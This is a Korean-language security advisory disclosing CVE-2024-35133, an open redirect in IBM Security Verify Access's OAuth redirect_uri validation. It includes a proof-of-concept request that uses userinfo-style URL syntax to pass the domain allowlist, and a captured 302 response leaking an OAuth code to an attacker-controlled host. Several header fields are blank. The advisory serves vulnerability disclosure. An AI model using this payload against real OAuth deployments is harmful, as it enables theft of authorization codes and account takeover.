
# CVE-2024-35133 보안 권고 - PoC 포함
개정 버전: 1.0
영향:
원격 공격자는 피해자를 특수하게 제작된 웹사이트를 방문하도록 유도함으로써 이 취약점을 악용하여 표시되는 URL을 스푸핑하고 사용자를 악성 웹사이트로 리다이렉트할 수 있습니다. 이를 통해 공격자는 매우 민감한 정보를 획득하거나 피해자에 대한 추가 공격을 수행할 수 있습니다.
심각도:
CVSS 점수:
CVE-ID: CVE-2024-35133
공급업체: IBM
영향을 받는 제품:
영향을 받는 버전: 10.0.0 - 10.0.8
IBM Security Verify Access는 완전한 권한 부여 및 네트워크 보안 정책 관리 솔루션입니다. 지리적으로 분산된 인트라넷과 엑스트라넷 전반에 걸쳐 리소스에 대한 종단 간 보호를 제공합니다.
주요 기능은 다음과 같습니다:
고객사를 대상으로 한 OAuth 흐름 침투 테스트 중 OAuth "code" 변수의 유출을 허용하는 오픈 리다이렉트 취약점이 발견되었습니다.
공격자는 OAuth 흐름 중 "redirect_uri" 매개변수 검증을 담당하는 파서의 로직을 우회하여(RFC 3986 활용) IBM Security Verify Access의 도메인 허용 목록 필터를 조작할 수 있었습니다. 그 결과 공격자가 제어하는 임의의 도메인으로의 오픈 리다이렉트가 발생했습니다. 피해자는 도메인이 신뢰할 수 있는 것처럼 보이는 동안 악성 사이트로 리다이렉트될 수 있습니다.
이는 OAuth "code" 토큰과 같은 민감한 정보의 노출이나 피해자에 대한 추가 공격으로 이어질 수 있습니다.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
패치, 업그레이드 또는 권장 해결 방법에 대한 정보는 IBM 보안 게시판 7166712를 참조하십시오.
자세한 내용은 참조를 확인하십시오.
이 취약점은 다음에 의해 발견 및 보고되었습니다:
Copyright (c) 2024 Giulio Garzia "Ozozuz"
본 경고의 전자적 재배포는 허용됩니다. 명시적인 서면 동의 없이는 편집할 수 없습니다. 다른 매체에 본 경고를 재인쇄하려면 작성자에게 문의하십시오.
고지사항: 본 권고의 정보는 게시 시점에 사용 가능한 데이터를 기준으로 정확합니다. 어떠한 보증도 제공되지 않습니다. 작성자와 발행인은 본 정보의 사용으로 인해 발생하는 직접적, 간접적 또는 결과적 손해에 대해 책임을 지지 않습니다.